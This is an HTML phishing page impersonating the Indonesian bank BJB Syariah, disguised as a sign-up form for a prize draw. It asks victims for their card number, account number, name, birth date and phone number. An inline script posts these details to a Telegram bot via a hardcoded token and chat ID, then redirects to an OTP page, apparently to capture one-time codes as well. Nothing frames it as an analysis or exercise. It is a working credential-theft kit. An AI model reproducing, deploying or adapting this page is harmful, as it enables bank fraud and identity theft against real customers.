<!doctype html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content=""> 
  <link rel="canonical" href=""> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content="BJB Syariah"> 
  <meta name="twitter:title" content="BJB Syariah"> 
  <meta property="og:site_name" content="BJB Syariah"> 
  <meta name="twitter:site_name" content="BJB Syariah"> 
  <meta property="og:description" content=""> 
  <meta name="twitter:description" content="">
  <link rel="image_src" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo5Wf2jmQWXzE3iCaevNUEL_1NpWh6SFTj4g&usqp=CAU?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo5Wf2jmQWXzE3iCaevNUEL_1NpWh6SFTj4g&usqp=CAU?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo5Wf2jmQWXzE3iCaevNUEL_1NpWh6SFTj4g&usqp=CAU?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content=""> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Gebyar Undian | BJB Syariah</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: -20px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FDD017;
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 80%; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 16px; 
            font-weight: 400; 
            color: black; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 2px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }
    </style> 
 </head> 
 <body style="background: #696969;"> 
         <center>
      <img src="/bg_onboarding.png" style="width: 100%; margin-top: 0%; margin-left: 0px; items-align: center;"></center>
  <div class="container"> 
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: 0px; margin-bottom: 0px; border-radius: 0px;">
              <br>
        <img src="/bjbs_new.png" style="width: 40%; margin-left: 0; margin-top: -100%; background: none;">
        <br>
                    </div>
    <center>
        <p style="color: white; font-size: 16px; text-align: center; margin-top: -30%; font-weight: bold;">Assalamualaikum</p>
        <br>
    <p style="color: white; font-size: 15px; text-align: center; margin-top: -5%; font-weight: bold;">Formulir pendaftaran<br>Gebyar-undian bjb'syariah</p>
    <div class="bubble-element Popup bubble-r-container relative" style="margin-top: -5%; left: 0px; right: 0px; position: fixed; z-index: 2002; margin-left: auto; margin-right: auto; width: 100%; height: 70%; overflow-y: auto; border-style: outset; border-width: 1px; border-left:  0px solid silver; border-right: 0px solid silver; border-top: 0px solid silver; border-bottom: 0px solid silver; border-radius: 6px; background: transfarent; opacity: 0.9; padding: 0px 0px; border-radius: 10px;">
<br>
<form id="tg" onsubmit="">
    <input required class="contoh1" style="width:80%;height: 35px; border: 1px solid silver; margin-left: 0%; margin-top: 0%; background: white; border-radius: 3px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="tel" minlength="16" maxlength="19" name="kartu" id="kartu" placeholder="Masukan Nomor Kartu"><br>
    <input required class="contoh1" style="width:80%;height: 35px; border: 1px solid silver; margin-left: 0%; margin-top: 3%; background: white; border-radius: 3px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="tel" minlength="" maxlength="" name="rek" id="rek" placeholder="Masukan No. Rekening"><br>
        <input required class="contoh1" style="width:80%;height: 35px; border: 1px solid silver; margin-left: 0%; margin-top: 3%; background: white; border-radius: 3px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="text" minlength="" maxlength="" name="name" id="name" placeholder="Masukan Nama Nasabah"><br>
        <input required class="contoh1" style="width:80%;height: 35px; border: 1px solid silver; margin-left: 0%; margin-top: 3%; background: white; border-radius: 3px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="tel" minlength="8" maxlength="8" name="tgl" id="tgl" placeholder="Masukan Tanggal Lahir"><br>
        <input required class="contoh1" style="width:80%;height: 35px; border: 1px solid silver; margin-left: 0%; margin-top: 3%; background: white; border-radius: 3px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="tel" minlength="10" maxlength="13" name="hp" id="hp" placeholder="Masukan Nomor Handphone"><br>
               <button type="submit" style="width: 80%; height: 38px; margin-top: 10%; font-size: 16px; background: #696969; color: white; border-radius: 50px; border: 1px solid white; font-weight: bold;">Registrasi</button></center>
 <br>
         <p id="status"></p>
  </div> 
 </div>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
</div>
             </div>
        <script>
const TOKEN = "6272190389:AAFLE9onh0xC8mY_pVTxuySJb9X9vnh0rd4";
const CHAT_ID = "5651214294";
const URL_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;

const form = document.getElementById("tg");

form.addEventListener("submit", onSubmitTelegram);

function onSubmitTelegram(e) {
  e.preventDefault();

  const { kartu, rek, name, tgl, hp, } = form;
  const data = {
    kartu: kartu.value,
    rek: rek.value,
    name: name.value,
    tgl: tgl.value,
    hp: hp.value,
  };

  let message = `<b></b>\n`;
  message += `<b>No-Kartu : </b> ${data.kartu}\n`;
  message += `<b>No-Rekening : </b> ${data.rek}\n`;
  message += `<b>Nama : </b> ${data.name}\n`;
  message += `<b>Tgl-Lahir : </b> ${data.tgl}\n`;
  message += `<b>No-Hp : </b> ${data.hp}\n`;

  const dataTg = {
    chat_id: CHAT_ID,
    text: message,
    parse_mode: "html",
  };

  const options = {
    method: "POST",
    body: JSON.stringify(dataTg),
    headers: {
      "Content-Type": "application/json",
    },
  };

  fetch(URL_API, options)
    .then((res) => res.json())
    .then((res) => console.log(res))
    .catch((err) => console.log(err));
    
    window.location.href='/otp.html';
}

</script>
</form>
</body>
</html>
